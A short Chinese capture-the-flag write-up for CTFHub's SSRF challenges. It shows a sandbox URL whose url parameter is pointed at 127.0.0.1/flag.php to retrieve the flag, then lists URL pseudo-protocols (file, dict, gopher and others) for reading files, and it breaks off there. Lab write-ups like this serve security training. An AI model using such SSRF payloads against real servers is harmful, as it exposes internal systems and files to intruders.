内网访问

SSRF攻击的目标是外网无法访问的内网系统，也正因为请求是由服务端发起的，所以服务端能请求到与自身相连而与外网隔绝的内部系统。

地址栏网址为：

<http://challenge-af4bd941cae006dd.sandbox.ctfhub.com:10080/?url=_>

说明服务器访问我们输入的地址，通过127.0.0.1可以访问内网资源，修改url

<http://challenge-af4bd941cae006dd.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php>

得到flag

伪协议读取文件

知识点

URL伪协议有：

• file:///
• dict://
• sftp://
• ldap://
• tftp://
• gopher://

原始url